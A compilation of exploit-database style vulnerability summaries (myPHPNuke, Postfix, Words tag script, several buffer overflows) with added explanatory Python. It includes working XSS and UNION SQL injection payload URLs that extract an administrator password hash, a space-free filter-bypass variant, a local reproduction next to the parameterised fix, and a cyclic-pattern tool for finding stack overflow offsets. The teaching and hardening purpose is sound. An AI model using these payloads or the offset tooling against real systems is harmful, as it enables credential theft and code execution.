There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke. XSS: http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E SQL Injection: http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1 This query returns the login and password (hash) of the administrator. Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In the latest version additional filters were added, so it is not vulnerable to these particular XSS and SQL Injection requests. However, version 1.8.8_8rc2 is still vulnerable to SQL Injection, so a limited SQL Injection attack (one that uses no spaces or brackets) remains possible.
This PoC exploits a local privilege escalation vulnerability in Postfix. It creates a hardlink to a symlink, which is not dereferenced, and then creates an alias in the alias maps. It then sends mail to the root user, and delivery of that mail is used to modify the /etc/passwd file.
A vulnerability exists in Words tag script v1.2 which allows an attacker to inject arbitrary SQL commands via the 'word' parameter of the 'index.php' script. An attacker can exploit this vulnerability to read sensitive information from the database and, depending on the privileges of the database account, potentially execute commands on the server or gain access to the server itself.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed by the backend database. This can allow an attacker to read sensitive information such as usernames, password hashes and other data stored in the database.
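The two SQL injection entries above (print.php in myPHPNuke and the 'word' parameter of Words tag script) share one root cause: a request parameter is concatenated into a query string. The following is an added example, not code from either project, that reproduces the print.php payload against a constructed in-memory SQLite database and shows the hardened form. The stories table layout and the 6-column select are assumptions chosen to match the 6-value UNION in the PoC; only the mpn_authors columns aid and pwd come from the advisory. The space-free variant assumes the later filter strips or blocks spaces but not comment tokens, which is an assumption about the filter, not something the advisory states.

```python
import sqlite3

# Constructed sample database (assumed layout, see lead-in).
SCHEMA = """
CREATE TABLE mpn_stories (sid INTEGER, catid INTEGER, aid TEXT, title TEXT,
                          hometext TEXT, bodytext TEXT);
CREATE TABLE mpn_authors (aid TEXT, pwd TEXT);
INSERT INTO mpn_stories VALUES (1, 1, 'editor', 'Hello', 'intro', 'body');
INSERT INTO mpn_authors VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# Assumed shape of the story query; six columns so the UNION lines up.
STORY_SQL = "SELECT sid, catid, aid, title, hometext, bodytext FROM mpn_stories WHERE sid="

# The advisory's payload, URL-decoded, and an equivalent with every space
# replaced by an empty SQL comment (assumption: the filter blocks spaces,
# not comment tokens). Neither variant needs brackets.
PAYLOAD = "-1 union select null,null,aid,pwd,null,null from mpn_authors limit 0,1"
PAYLOAD_NO_SPACES = PAYLOAD.replace(" ", "/**/")


def open_db():
    """Fresh in-memory database populated with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def print_story_vulnerable(conn, sid):
    """Mirrors the flaw: the sid parameter is concatenated into the query."""
    return conn.execute(STORY_SQL + sid).fetchall()


def print_story_fixed(conn, sid):
    """Hardened: sid must parse as an integer and is passed as a bound parameter."""
    sid_int = int(sid)  # raises ValueError for anything that is not an integer
    return conn.execute(STORY_SQL + "?", (sid_int,)).fetchall()


def fixed_rejects(conn, sid):
    """True if the hardened handler refuses the input instead of executing it."""
    try:
        print_story_fixed(conn, sid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", print_story_vulnerable(db, PAYLOAD))
    print("no spaces: ", print_story_vulnerable(db, PAYLOAD_NO_SPACES))
    print("fixed rejects payload:", fixed_rejects(db, PAYLOAD))
```

Both payload variants return the administrator's aid and pwd through the story query, which is why a blacklist on spaces or keywords does not close the hole; type validation plus a bound parameter does.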
This exploit allows an attacker to read and write registry values and to read files. It uses the FT.RegistryValue function to read and write registry values and the FT.GetTextFile function to read files.
Acoustica Beatcraft contains a buffer overflow triggered by an overly long string. The buffer holds the 'title' of the 'instruments' one can insert into a Beatcraft project. This exploit is somewhat unstable: to exploit it properly, one must first open Beatcraft and then open the exploit file from within Beatcraft. Simply double-clicking the file results in a plain DoS.
This vulnerability causes Explorer.exe to crash and Internet Explorer to close silently. It is a work in progress; the author is still trying to achieve arbitrary code execution with it.
This exploit is based on n00b's findings and executes arbitrary code on the vulnerable system. It is a buffer overflow exploit that takes advantage of a vulnerability in Acoustica MP3 CD Burner version 4.51 Build 147 and possibly older versions. It was tested on a fully patched Windows XP SP3.
A remote buffer overflow vulnerability exists in the Najdi.si Toolbar. The vulnerability is caused by a boundary error when handling overly long URLs, which can be exploited to cause a stack-based buffer overflow via a specially crafted URL passed to the vulnerable application. Successful exploitation may allow execution of arbitrary code.
A vulnerability exists in the LogMeIn Remote Access Utility ActiveX component (RACtrl.dll) which can be exploited to cause a denial of service. The vulnerability is caused by a boundary error when handling the 'fgcolor', 'bgcolor' and 'fmcolor' properties, and can be exploited to corrupt memory by supplying a specially crafted value to any of the affected properties. Successful exploitation may allow execution of arbitrary code, but this has not been confirmed.
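The Beatcraft instrument title, the MP3 CD Burner and Najdi.si Toolbar overflows above all start from the same observation: an overly long string overwrites a fixed-size stack buffer and eventually the saved return address. The first thing a practitioner does with such a crash is find how many bytes sit between the start of the string and the overwritten return address. The following is an added example, not code from any of those exploits, implementing the standard cyclic-pattern technique (the same construction Metasploit's pattern_create/pattern_offset use): generate a string in which every 4-byte window is unique, feed it in place of the long title or URL, and map the value that lands in the instruction pointer back to an offset. The file formats of the affected products are not known from these entries, so the block stops at producing the pattern and decoding the crash value; it does not build a file.

```python
import string

# Each triplet is Upper+lower+digit, so the pattern is unique for
# 26*26*10*3 = 20280 bytes; longer requests wrap, which is flagged below.
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return a cyclic pattern of the given length (Aa0Aa1Aa2...)."""
    parts = []
    total = 0
    while total < length:
        for a in string.ascii_uppercase:
            for b in string.ascii_lowercase:
                for c in string.digits:
                    parts.append(a + b + c)
                    total += 3
                    if total >= length:
                        return "".join(parts)[:length]
    return "".join(parts)[:length]


def crash_value_to_text(value):
    """Turn a debugger register value such as '0x31624130' into the 4 ASCII
    bytes that overwrote it. Stack buffers on x86 are little-endian, so the
    register shows the bytes reversed; a plain 4-character string is
    passed through unchanged."""
    if value.lower().startswith("0x"):
        raw = bytes.fromhex(value[2:].rjust(8, "0"))[::-1]
        return raw.decode("ascii", errors="replace")
    return value


def pattern_offset(value, length=MAX_UNIQUE):
    """Offset of the crash value inside the pattern, or -1 if it is not
    present (the overwrite did not come from the pattern, or the pattern
    was longer than MAX_UNIQUE and the match is ambiguous)."""
    if length > MAX_UNIQUE:
        # A longer pattern repeats, so any hit could be off by a multiple
        # of MAX_UNIQUE; refuse rather than report a misleading offset.
        return -1
    return pattern_create(length).find(crash_value_to_text(value))


if __name__ == "__main__":
    # Constructed crash value: EIP reads 0x31624130 after sending a
    # 5000-byte pattern as the title/URL string.
    print(pattern_create(40))
    print("offset:", pattern_offset("0x31624130", length=5000))
```

Send pattern_create(n) as the overlong string, read the faulting instruction pointer from the debugger, and pattern_offset tells you how many bytes precede the saved return address; that offset is what the crafted title or URL must pad before the bytes it wants to control. If the result is -1, the crash was not a clean return-address overwrite from your input and the pattern length or the crash site needs another look.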